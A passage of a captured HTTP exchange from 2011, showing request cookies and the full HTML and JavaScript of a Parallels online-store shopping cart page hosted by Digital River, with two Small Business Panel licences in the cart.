Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=ed047e3c47a758dd56638158d4729675; __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.1.10.1299874733; s_cc=true; s_gpv_page=ParallelsSmallBusinessPanelforWindowsEN; s_vnum=1331410733871%26vn%3D1; s_invisit=true; s_nr=1299874733877-New; s_sq=%5B%5BB%5D%5D; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=68351301417,0)
Date: Fri, 11 Mar 2011 20:18:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 42028




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=meta.html"-->
<link rel="icon" href="/DRHM/Storefront/Site/para/cm/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/commonFunctions.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/mbox.js"></script>
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=d445603d&Env=BASE&Locale=en_US&SiteID=para&StyleID=26770400&StyleVersion=58&ceid=170596700&cename=TopHeader&id=ThreePgCheckoutShoppingCartPage"-->






<!-- REQUEST ID: TIME=1299866217516:NODE=c1a6104:THREAD=37; ESI Fragment - CREATED: Fri Mar 11 11:56:57 CST 2011 MAX-AGE: 28800+180 -->
<!-- BEGIN TOPHEADER -->
<!-- -->

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Parallels, Inc. (para) Online Store - Shopping Cart</title>
<!-- Accessibility links for Home, Help, and Contents (Sitemap) -->
<link rel="home" href="/store/para/en_US/home" title="Home"/>
<link rel="help" href="/store/para/en_US/help" title="Help"/>
<link rel="contents" href="/store/para/en_US/sitemap" title="Sitemap"/>














<script type="text/javascript">
var q = true; // Page-level global variable

// Temporary popUp function that will be replaced by the overlay-enhanced version when the DOM is fully loaded
function popUp(popURL, popName, popWidth, popHeight) {
self.open(popURL, popName, 'width='+popWidth+',height='+popHeight+',resizable=yes,status=yes,screenX=50,screenY=50,top=50,left=50,scrollbars=yes');
}
</script>






<script type="text/javascript">



if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}

</script>









<script type="text/javascript">
var pageNameFlag = '';
</script>


<!-- Global OT: ptomodule object and browser-detection/cookie-setting -->
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/OTGlobalCode.js"></script>
<script type="text/javascript">
var ot_Country = 'en_US';
</script>
<!-- Site-level OT, from PageBuilder page: OT_globalTrial -->
<script type="text/javascript" src="//atl.img.digitalriver.com/drso/drso-1.4.min.js"></script>
<script type="text/javascript">
if (typeof(optrial) !== 'object') {
optrial = {};
}
//set the cross-domain cookie for NCT Trial Reg test, and delete the download page session cookie (so the sale wil count toward NCT, not download page tests
if (drso.getSessionVar('op612nctfulfill0285001liid').length > 0){
drso.setCookie('op612nctfulfill0285001liid', drso.getSessionVar('op612nctfulfill0285001liid'), drso.getDomain(), null);
drso.deleteCookie('op612downloadparallelsdesktop5formaceliid');
}
</script>
<!-- End of OT_globalTrial -->

<!-- Page-level OT, from OT_ThreePgCheckoutShoppingCartPage_contentBody -->
<script>
optrial.pageName = 'ThreePgCheckoutShoppingCartPage';

// Portfolio: GC-para
// Subject: ThreePgCheckoutShoppingCartPage
(function(){var _o=ptomodule;_o.U="https://ssl.pto.digitalriver.com/by/trial/612/p/threepgcheckoutshoppingcartpage./15/content.js";
_o.ST="script";_o.SA={"type":"text/javascript"};_o.B();_o.R(1000,null,null,null);})();
</script>
<!-- End of OT_ThreePgCheckoutShoppingCartPage_contentBody -->


</head>
<body>


<span class="opDefault" id="opmodule_para_bodyTop"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyTop');
</script>



<!-- END TOPHEADER -->

<!--!/esi:include --><!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section0.html"-->
<!--[if IE]
<style type="text/css">
#dr_productUpSell form div#dr_siteButtons {
margin-top:130px;
}
table#us_buttons {
margin:0px 0px 0px 225px;    
}    
</style>
-->

<table border="0" cellpadding="0" cellspacing="0" width="805" align="center">

<tr>
<td class="logo" width="667px"><h1><a href="//www.parallels.com/" title="Parallels"></a></h1></td>
<td id="secureInfo" width="138px"><!--SECURE-LOGO-->

<!--!/esi:include -->






<!-- REQUEST ID: TIME=1299874692219:NODE=c1a6104:THREAD=71 -->








<div id="dr_geoTrustIcon">
<!-- GeoTrust[tm] Smart Icon tag. Do not edit. -->
<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
<!-- end GeoTrust Smart Icon tag -->
</div>

<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section1.html"-->
       
<!--/SECURE-LOGO-->
</td>

</tr>
<tr>
<td class="breadCrumbsRed" colspan="2"><img src="/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_on.jpg" alt="Step 1 Cart" width="200" height="22" id="stepOne" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg" alt="Step 2 Billing" width="200" height="22" id="stepTwo" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg" alt="Step 3 Verify" width="200" height="22" id="stepThree" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_off.jpg" alt="Step 4 Complete" width="200" height="22" id="stepFour" /></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" class="main" align="center">
<tr>
<td><div id="content">
<!--!/esi:include -->




<span class="opDefaultContent" id="opmodule_para_ThreePgCheckoutShoppingCartPage_contentBody">























<!-- Splash Transformer Optimized -->










<!--..Layout: ThreePgCheckoutShoppingCartPage, Generated: Tue Mar 08 16:04:09 CST 2011..-->
<div xmlns="http://www.w3.org/1999/xhtml">
<div xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" class="dr_Content" id="dr_ThreePgCheckoutShoppingCart">
<h1>Shopping Cart</h1>
<div id="dr_currencySelector">
<form method="get" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<p>
<strong>Select Currency:</strong>
<select name="currency" onChange="q=false;this.form.submit();">
<option selected="selected">USD</option>
<option>AED</option>
<option>ARS</option>
<option>AUD</option>
<option>BGN</option>
<option>BRL</option>
<option>CAD</option>
<option>CHF</option>
<option>CLP</option>
<option>CNY</option>
<option>CZK</option>
<option>DKK</option>
<option>EEK</option>
<option>EGP</option>
<option>EUR</option>
<option>GBP</option>
<option>HKD</option>
<option>HRK</option>
<option>IDR</option>
<option>ILS</option>
<option>INR</option>
<option>ISK</option>
<option>JPY</option>
<option>KRW</option>
<option>LTL</option>
<option>LVL</option>
<option>MXN</option>
<option>MYR</option>
<option>NOK</option>
<option>NZD</option>
<option>PLN</option>
<option>RUB</option>
<option>SAR</option>
<option>SEK</option>
<option>SGD</option>
<option>THB</option>
<option>TRY</option>
<option>TWD</option>
<option>UAH</option>
<option>ZAR</option>
</select>
<noscript>
<input type="submit" class="dr_button" value="update"/>
</noscript>
</p>
</form>
</div>
<form method="post" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input value="com.digitalriver.template.form.ShoppingCartForm" name="Form" type="hidden"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<div id="dr_orderNumber">
<p>
<strong>Reference Number:</strong>..7154199726</p>
</div>
<div id="dr_shoppingCartTable">
<table id="dr_cartTbl" summary="This table contains your Shopping Cart information">
<thead>
<tr>
<th scope="col" class="dr_productName">Product Name</th>
<th class="dr_qty" scope="col">Qty</th>
<th class="dr_deliveryMethod" scope="col">Delivery</th>
<th class="dr_price">Price</th>
<th class="dr_remove" scope="col">remove</th>
</tr>
</thead>
<tbody>
<tr class="dr_oddRow">
<td scope="row" class="dr_productName">
<a target="_blank" href="/store/para/en_US/DisplayPage/id.ProductInterstitialDetailsPage/productID.222100500" onclick="popUp(this.href,'productDetail',450,400);return false;" lineItemID="5217904426">Parallels Small Business Panel for Windows - 1 User</a>
</td>
<td class="dr_qty">
<input type="hidden" name="ORIG_VALUE_lineItemID$$1001" value="5217904426"/>
<input name="lineItemID$$1001" value="5217904426" type="hidden"/>
<span class="dr_error">
<!--..-->
</span>
<input type="hidden" name="ORIG_VALUE_quantity$$1001" value="2"/>
<input name="quantity$$1001" value="2" size="2" class="dr_qtyInput" type="text"/>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
</td>
<td class="dr_deliveryMethod" scope="row"/>
<td scope="row" class="dr_price">$80.00</td>
<td class="dr_remove" scope="row">
<a class="dr_deleteItemLink" href="/store/para/en_US/RemoveItemFromRequisition/lineItemID.5217904426/nextAction.DisplayThreePgCheckoutShoppingCartPage" title="remove" rel="nofollow">
<img class="dr_deleteItemImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/removex2new.gif" alt="remove"/>
</a>
</td>
</tr>
<tr>
<td colspan="5" class="dr_backUpCD">
<div class="bucket-noheader-container">
<div class="bucket-top">
<span/>
</div>
<div class="bucket-borders">
<div class="bucket-noheader-content">
<div class="candy">
<h2 class="hdr-alpha">
<span id="dr_candyRackHeader" class="dr_subHeader">
<em>
                                                           We also recommend:
                                                       </em>
</span>
</h2>
</div>
</div>
</div>
<div class="bucket-btm">
<span>..</span>
</div>
</div>
</td>
</tr>
<tr>
<td colspan="3" class="dr_couponCode">
<label for="promoCode">Promo Code:</label>
<input type="hidden" name="ORIG_VALUE_popName" value="PointOfSale_CouponEntryField"/>
<input name="popName" value="PointOfSale_CouponEntryField" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_couponCode" value=""/>
<input name="couponCode" value="" type="text" size="10" id="promoCode"/>
<input type="image" class="dr_button" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_apply.gif"/>
</td>
<td colspan="2" class="dr_updateBtn"/>
</tr>
<tr id="dr_cartTotals">
<td colspan="3"/>
<td id="dr_totals" colspan="2">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr id="dr_priceTotal">
<td class="dr_price dr_totals">Total: $80.00</td>
</tr>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
<div id="dr_siteButtons">
<div id="dr_continueShoppingButton">
<a class="dr_button" href="/store/para/en_US/ContinueShopping">
<img border="0" alt="continue shopping" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_continueShopping.gif"/>
</a>
</div>
<div id="dr_checkoutButton">
<a class="dr_button" href="https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage">
<img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_checkout.gif" alt="checkout"/>
</a>
</div>
</div>
<div id="creditCardLogos">
<img alt="Accept Credit Cards" src="/DRHM/Storefront/Site/para/cm/images/payment-methods2.gif"/>
</div>
<p id="dr_cartPricingDisclaimer" class="dr_clearBoth">Prices and offers in the cart are subject to change until the order is submitted.</p>
<div id="dr_TCFooter"><div id="dr_overlay_wrapper" style="position:absolute;width:687px;height:383px;display:none;"><table border="0" cellspacing="0" cellpadding="0" id="dr_overlay_table"><tr><td class="dr_overlay_table_top_left">&nbsp;</td><td class="dr_overlay_table_top_middle">&nbsp;</td><td class="dr_overlay_table_top_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_left">&nbsp;</td><td class="dr_overlay_table_middle"><div id="dr_overlay_header"><div id="dr_overlay_close_window"><a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a></div><div id="dr_overlay_logo"><a href="/store/defaults/en_US&id=DRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a></div><div class="dr_overlay_clearit"><!-- --></div><div id="dr_overlay_nav"><ul id="dr_overlay_tabs"><li class="dr_overlay_about_digital_river"><a id="ContactInformationLink" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe">About Digital River, Inc.</a></li><li class="dr_overlay_privacy_policy"><a id="PrivacyPolicyLink" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage" target="DrOverlayIframe">Privacy Policy</a></li><li class="dr_overlay_terms_and_conditions"><a id="TermsAndConditionsLink" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage" target="DrOverlayIframe">Terms of Sale</a></li><li class="dr_overlay_print"><a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/icon_printer.gif" alt="Print"/></a></li></ul><!-- /#dr_overlay_tabs --></div><div class="dr_overlay_clearit"><!-- --></div></div><!-- /#dr_overlay_header --><iframe name="DrOverlayIframe" src="javascript:false" width="665" height="300" scrolling="auto" frameborder="0" marginheight="0" marginwidth="0"></iframe></td><td class="dr_overlay_table_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_bottom_left">&nbsp;</td><td class="dr_overlay_table_bottom_middle">&nbsp;</td><td class="dr_overlay_table_bottom_right">&nbsp;</td></tr></table></div><!-- /#dr_overlay_wrapper --><script type="text/javascript">if (!window.jQuery) {document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');}</script><script type="text/javascript">(function($){$(window).load(function(){if ($.boxModel || ($.support && $.support.boxModel)) {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.base.css" type="text/css"/>');var msie = navigator.userAgent.match(/MSIE (\d+)/);var ie6 = false;var dataOK = true;if (msie) {var ver = parseInt(msie[1]);if (ver < 8) {dataOK = false;if (ver < 7) {ie6 = true;$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE6.css" type="text/css"/>');}else {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE7.css" type="text/css"/>');}}}else if (/Firefox\/3\.5/.test(navigator.userAgent)) {dataOK = false;}if (dataOK) {$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.data.css" type="text/css"/>');}var overlaySetup = function(){var footerLinkSelector = 'a.dr_aboutDigitalRiver,a.dr_privacyPolicy,a.dr_termsAndConditions';$(footerLinkSelector).removeAttr('onclick');$('#dr_overlay_wrapper').overlay({fixed: !ie6,modal: {css: {backgroundColor: '#FFF'}},showSelector: footerLinkSelector,hideSelector: '#dr_overlay_close_window > a[href="#"]',onShow: function(bgOverlay, footerLink){var iframeOverlay = this;$(bgOverlay).fadeIn('normal', function(){if (ie6) {self.scrollTo(0, 0);}$(iframeOverlay).slideDown('slow');});$('iframe', this).one('load', function(){$(this).css('visibility', 'visible');});parent.frames[footerLink.target].location.replace(footerLink.href);return false;},onHide: function(bgOverlay){$(this).hide();$(bgOverlay).fadeOut('normal');return false;}}).find('li.dr_overlay_print > a[href="#"]').click(function(){if (window['DrOverlayIframe']) {window['DrOverlayIframe'].focus();window['DrOverlayIframe'].print();}}).end().find('#dr_overlay_logo > a,li.dr_overlay_about_digital_river > a,li.dr_overlay_privacy_policy > a,li.dr_overlay_terms_and_conditions > a').click(function(){parent.frames[this.target].location.replace(this.href);return false;});};if ($.fn.overlay) {overlaySetup();}else {$.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay-1.1.min.js',dataType: 'script',cache: true,global: false,success: overlaySetup});}}});})(jQuery);</script><p><a class="dr_aboutDigitalRiver" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'aboutDigitalRiver',400,400);return false;" target="DrOverlayIframe">Digital River Inc.</a> is the authorized reseller and merchant of the products and services offered within this store.</p><p><a class="dr_privacyPolicy" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'privacyPolicy',660,400);return false;" target="DrOverlayIframe">Privacy Policy</a>&nbsp;&nbsp;&nbsp;<a class="dr_termsAndConditions" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'termsAndConditions',630,400);return false;" target="DrOverlayIframe">Terms of Sale</a>&nbsp;&nbsp;&nbsp;</p></div>
</form>
</div>
</div>




<script type="text/javascript">
// Called via onchange from shipping dropdown
function changeEstimatedShipping(zoneList, optionList, shippingForm) {
if (zoneList.selectedIndex !== 0) {
shippingForm.shippingOptionID.value = optionList.options[optionList.selectedIndex].value;
shippingForm.country.value = zoneList.options[zoneList.selectedIndex].value;
q = false;
shippingForm.submit();
}
}
// fireclick
var fc_track = "shopping_cart";









/* Add */
var fc_prod_add = "[1]SP-SMBPanel Parallels Small Business Panel for Windows - 1 User?222100500?1?40.00";







</script>


</span><!-- /.opDefaultContent -->
<script type="text/javascript">
ptomodule.displayModule('para_ThreePgCheckoutShoppingCartPage_contentBody');
</script>
















<!-- popUp overlay tags -->
<div class="popup_window_wrapper" style="display:none;position:absolute;">
<div class="popup_window_title_bar_wrapper">
<div class="popup_shadow9"></div>
<div class="popup_title_bar">
<h1 class="popup_title_header"></h1>
<div class="popup_close_button_wrapper">
<div class="popup_button_cover"><a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" alt="Close Window" border="0"/></a></div>
<div class="popup_title_fade"></div><div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_close_button_wrapper -->
</div><!-- /.popup_title_bar -->
<div class="popup_shadow1"></div>
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_window_title_bar_wrapper -->
<div class="popup_middle_wrapper">
<div class="popup_left_shadow_wrapper"><div class="popup_shadow8"></div><div class="popup_shadow7"></div></div><!-- /.popup_left_shadow_wrapper -->
<div class="popup_content_wrapper"><iframe class="popup_content_iframe" src="javascript:false;" scrolling="auto" frameborder="0">Loading...</iframe></div>
<div class="popup_right_shadow_wrapper"><div class="popup_shadow2"></div><div class="popup_shadow3"></div></div><!-- /.popup_right_shadow_wrapper -->
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_middle_wrapper -->
<div class="popup_bottom_bar_wrapper"><div class="popup_shadow6"></div><div class="popup_shadow5"></div><div class="popup_shadow4"></div><div class="popup_clear_it"><!-- --></div></div><!-- /.popup_bottom_bar_wrapper -->
</div><!-- /.popup_window_wrapper -->










<script type="text/javascript">
//if (pageNameFlag=='confirmOrderPage') {
//$('#dr_shipMethod').change(onShippingMethodChange);
//}

if (pageNameFlag=='quickBuyCartPage') {
$("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
});
}
</script>



<script type="text/javascript">
// Function to hide/show info
function hideText(id) {
jQuery('#'+id).toggle();
}
// Function to disable submit button after it has been clicked once already to prevent multiple order submission on CheckoutPayment and ConfirmOrder
function disableButton(button) {
//jQuery(button).hide();
}
// Pull in the overlay verison of popUp on DOM-ready, which will overwrite the old-school function above
if (top === self) { // Don't pull in this code if we're already in a pop-up (iframe)
jQuery(function(){


// Pull in the main CSS for the popUp overlay
       
jQuery.get('/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage', function(popUpStyle){
jQuery('head').append(popUpStyle);
}, 'html');

// Include browser-specific components
var dataOK = true;
var msie = navigator.userAgent.match(/MSIE (\d+)/);
if (msie) {
var ieVer = parseInt(msie[1]);
if (ieVer < 8) {
dataOK = false;
if ((ieVer < 7) && !jQuery.fn.overlay) { // Include the overlay plugin for IE6
jQuery.ajax({url: '//drh2.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay.min.js', dataType: 'script', cache: true, global: false});
}
}
}
else if (/Firefox\/3\.5/.test(navigator.userAgent)) {
dataOK = false; // FF 3.5 bug #477118
}
// Pull in the draggable popUp overlay script
jQuery.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.draggable.popUp.min.js', dataType: 'script', cache: true, global: false});
// Use embedded data: images for the shadows, if the browser can handle it
if (dataOK) {
jQuery('head').append('<link rel="stylesheet" type="text/css" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/PopUp.Shadows.data.css"/>');
}
});
}
</script>



































<script type="text/javascript">
// Show the links that will allow the details to be expanded
jQuery(function(){
jQuery('#shippingDifferentThanBillingIndicator,span.dr_expandDetails').show().find('[data-expand-section]').click(function(){
jQuery('#'+jQuery(this).attr('data-expand-section')).toggle();
return !(this.href);
}).click();
});
$('#dr_ExtendedDownloadServiceOffer .dr_button, #dr_BackUpCDOffer .dr_button').click( function() {
$(this).css('visibility','hidden');
});
</script>








<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section2.html"-->
</div></td>
</tr>
<tr>
<td id="copyright"><div class="left">&copy; 1999-2011 Parallels, Inc. All rights reserved.</div><div class="right"></div></td>
</tr>
</table>
<script type="text/javascript">
   var errorMssgs = [];
   $('.dr_error').each(function(i) {
       errorMssgs[i] = $(this).html();
   });
   for (i=0;i<errorMssgs.length;i++) {
       if (errorMssgs[i].indexOf('Enter a valid value') > -1) {
        $('#dr_ThreePgCheckoutAddressPaymentInfo p.dr_requiredFieldsInfo').before('<p id="topError" style="color:red; font-size:12px; font-weight:bold;">Sorry, we have encountered an error. Please check that you have filled in everything correctly below.</p>');
           break;
       }
   }
</script>

<script type="text/javascript">
fc_track = (typeof(fc_track) === 'undefined') ? null : fc_track;
$(function () {
   function op_ChangeBreadcrumbs(argCurrentStep) {
if (argCurrentStep === 'billing') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_on.jpg");
} else if (argCurrentStep === 'review') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_on.jpg");
} else if (argCurrentStep === 'thank_you') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg");
$("#stepFour").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_on.jpg");
}
   }
op_ChangeBreadcrumbs(fc_track);
});
</script>

<script>
// Added by J D April 2010 to customize site
//Updated by J J 5/27/2010 - 8/2010
// Floating security Cert to the right
$('div#dr_geoTrustIcon').css('float','right');
$('div#dr_geoTrustIcon a').css('float','right').css('text-align','right'); //for IE
$('div#dr_geoTrustIcon a img').css('float','right').css('text-align','right'); //for IE

// Re-labelling and repositioning the Upsell Interstitial "Continue" (with purchase) link and
// Re-labelling and repositioning the Upsell Interstitial "Upgrade" button
$('#dr_productUpSell form div#dr_siteButtons').replaceWith('<div id="acceptOfferInput"><input class="dr_acceptOffer" type="submit" value="Upgrade your purchase"/></div><div id="origPurchCont"><a href="/store/para/en_US/DisplayShoppingCartPage">Continue with original purchase</a></div>');

//Remove text from Upsell
$('#dr_productUpSell h1').hide('');
//$('#dr_productUpSell #dr_offer ul li div.dr_product img').hide('');
//$('#dr_productUpSell h2').hide('');
$('#dr_productUpSell #dr_offer ul li div.dr_price').hide('');

// Changing the Continue Shopping Button Text
$('#dr_continueShoppingButton a.dr_button').css('background-color','#ffffff').css('font-size','10px').css('color','#0857A6').css('text-decoration','underline').css('float','left');
$('#dr_continueShoppingButton a.dr_button').html('&#60;&#60; Continue Shopping');

// Floating Credit Cards to the right
$('#creditCardLogos').css('float','right');

// Making Cart Total Bigger
$('td#dr_totals table tr#dr_priceTotal td.dr_price').css('font-size','12px').css('font-family','verdana');

// Removing text breadcrumbs
$('#dr_CheckoutBreadcrumb').hide('');

// Removing link from Product Name
$('#dr_ThreePgCheckoutShoppingCart td.dr_productName a[href!="/store/para/en_US/DisplayPage/id.ExtendedDownloadServiceMerchInfoPage"]').each(function(index) {
$(this).wrap("<span class='dr_productInfo'>"+$(this).html()+"</span>").remove();
});
// Adding rounded borders to Account Login Header
$('#dr_loginContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Account Login Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Billing Info Header
$('#dr_billingContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Billing Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Additional Info Header
$('#dr_optInContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Additional Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Payment Info Header
$('#dr_paymentContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Payment Information</td><td class="rightRound"></td></tr></table>');

// Styling Gray Headers
$('.loginTable').css('background-color','#a0a0a4').css('height','26px');
$('td.leftRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/leftroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','left').css('height','26px').css('font-family','verdana').css('font-size','13px').css('font-weight','bold').css('color','#fff').css('background-color','#a0a0a4');
$('td.rightRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/rightroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','right').css('height','26px').css('width','10px');

// Changing add buttons on Thank You Page
$('#dr_thankYouElementContainer .addOnOffer').css('height','25px');

// Remove refresh button on Quantity
$('#dr_shoppingCartTable input.dr_refreshQtyImage').remove('');

// Styling sub-Cart refresh button
$('input.dr_refreshQtyImage').css('float','right').css('margin','10px 0px 10px 0px');

// Remove remove header
$('th.dr_remove').html('');

// Float the Currency Selector to the right, move it up higher
$('#dr_currencySelector').css('right','10px').css('position','absolute').css('top','10px');

// Float the Checkout Button to the right, move it up higher
$('#dr_checkoutButton').css('right','0px').css('position','absolute').css('top','48px');

// Style the "Estimated Shipping" header
$('div#dr_shippingEst h3.shippingEst').css('background-color','#e6e6e6').css('padding','3px 0px 3px 10px');

// Centering Disclaimer and Changing Font
$('p#dr_cartPricingDisclaimer').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');
$('div#dr_TCFooter').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');

// Adding horizontal rule above the disclaimer
$('<div id="horizontalRule"><hr width="60%" color="#e5e5e5"></div>').insertBefore('p#dr_cartPricingDisclaimer');
$('#horizontalRule').css('width','100%').css('text-align','center').css('margin-top','80px').css('margin-bottom','5px');

// Login Button on Billing Page
$('input#dr_cc_login').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/continueButton.jpg)').css('background-repeat','no-repeat').css('width','77px').css('height','25px');

// Check box to opt-IN for en_US locale
